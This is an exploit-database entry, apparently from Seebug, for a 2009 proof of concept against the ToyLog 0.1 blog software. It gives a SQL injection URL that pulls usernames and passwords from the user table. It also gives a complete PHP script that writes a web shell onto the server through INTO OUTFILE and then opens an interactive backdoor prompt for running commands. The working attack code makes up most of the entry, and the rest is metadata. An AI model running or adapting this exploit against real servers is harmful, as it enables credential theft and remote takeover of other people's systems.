ToyLog 0.1 SQL Injection Vulnerability/RCE Exploit

2009-07-10T00:00:00

Description

No description provided by source.

{"sourceData": "\n --+++=====================================================================================+++--\n--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--\n--+++=====================================================================================+++--\n\n[+] SQL Injection Vulnerability\nUrl: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user\n\n[+] Remote Command Execution Exploit\n\n#!/usr/bin/php\n<?php\n\nfunction usage () {\n\texit (\t"\\n".\n\t\t"+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\\n".\n\t\t"- -\\n".\n\t\t"+ ToyLog 0.1 Remote Command Execution Exploit +\\n".\n\t\t"- Author : darkjoker -\\n".\n\t\t"+ Site : http://darkjoker.net23.net +\\n".\n\t\t"- Download: http://sourceforge.net/projects/toylog/ -\\n".\n\t\t"+ Usage : php xpl.php <url> +\\n".\n\t\t"- Ex. : php xpl.php http://localhost/ToyLog/ -\\n".\n\t\t"+ +\\n".\n\t\t"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\\n".\n\t\t"\\n");\n}\n\nfunction hex_format ($string) {\n\t$i=0;\n\twhile ($i<strlen($string)) \n\t\t$hex .= "%".dechex(ord($string[$i++]));\n\treturn $hex;\n}\n\nfunction get_path ($host, $dir) {\n\t$fp = fsockopen ($host, 80);\n\t$query = hex_format ("1 UNION ALL SELECT * FROM does_not_exist");\n\t$req =\t"GET {$dir}read.php?idm={$query} HTTP/1.1\\r\\n".\n\t\t"Host: {$host}\\r\\n".\n\t\t"Connection: Close\\r\\n\\r\\n";\n\tfputs ($fp, $req);\n\twhile (!feof ($fp)) \n\t\tif (preg_match ("|resource in <b>(.+?)</b> on|", fgets ($fp, 1024), $data))\n\t\t\t$path = $data [1];\n\tlist ($path) = explode ("block/db.php", $path);\n\tfclose ($fp);\n\treturn $path;\n}\n\nfunction upload_shell ($host, $dir) {\n\t$fp = fsockopen ($host, 80);\n\t$shell_path = get_path ($host, $dir)."shell.php";\n\tif (!strcmp ($shell_path, "shell.php"))\n\t\tdie ("[-] Exploit failed.\\n");\n\t$query = hex_format('1 UNION ALL SELECT 1,2,\\'xxx<?php system (stripslashes($_GET[\\\\\\'cmd\\\\\\'])); ?>xxx\\',4 INTO OUTFILE \\''.$shell_path.'\\' FROM post');\n\t$req =\t"GET {$dir}read.php?idm={$query} HTTP/1.1\\r\\n".\n\t\t"Host: {$host}\\r\\n".\n\t\t"Connection: Close\\r\\n\\r\\n";\n\tfputs ($fp, $req);\n\tfclose ($fp);\n}\n\nif (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))\n\tusage ();\narray_shift ($data);\nlist ($host, $dir) = $data;\nupload_shell ($host, $dir);\n$stdin = fopen ("php://stdin", "r");\nwhile (1) {\n\techo "backdoor@{$host}: ";\n\t$cmd = hex_format(trim (fgets ($stdin, 1024)));\n\tif (!strcmp ($cmd, hex_format("exit")))\n\t\tbreak;\n\t$out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));\n\tarray_shift ($out);\n\tarray_pop ($out);\n\techo $out [0];\n}\n\n?>\n\n# sebug.net\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14856", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-14856", "type": "seebug", "viewCount": 2, "references": [], "lastseen": "2017-11-19T18:44:00", "published": "2009-07-10T00:00:00", "cvelist": [], "id": "SSV:14856", "enchantments_done": [], "modified": "2009-07-10T00:00:00", "title": "ToyLog 0.1 SQL Injection Vulnerability/RCE Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647675416}}